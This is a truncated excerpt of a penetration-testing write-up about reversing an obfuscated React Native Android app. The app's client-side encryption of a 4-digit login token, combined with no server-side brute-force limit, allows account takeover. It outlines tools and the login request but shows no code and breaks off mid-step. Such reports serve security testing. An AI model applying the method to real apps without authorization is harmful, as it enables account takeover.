Android Application’s Client Side Encryption Bypass Leads to Account Takeover

During android application penetration testing, I found an interesting scenario where the android application built on top of React Native and source code was obfuscated. During the login process, the application asks for userid and token, the token is of 4 digits. The token value is encrypted at client end and there is no brute-force protection implemented at server side.

Problem Statement

The challenge was to identify the encryption mechanism used for token encryption.

Problem Analysis

During the android application penetration testing, to identify the client-side encryption mechanism, I have used various tools like apktool, dex2jar, jd-gui to understand the encryption process.

As the application built on top of react native which results to single source file while reversing the application. It’s too hard to identify the logic by simply reversing the APK and then analyze the source code that we usually do for any java based android application as the source-code is not usually obfuscated.

POC Steps

During the login process, I observed that when we provide userid and token (4 digit) in the application, the application sent only “/user/authenticate” HTTP request which contained encrypted token information and userId.
Based on that I drew my conclusion that the encryption process might be at the…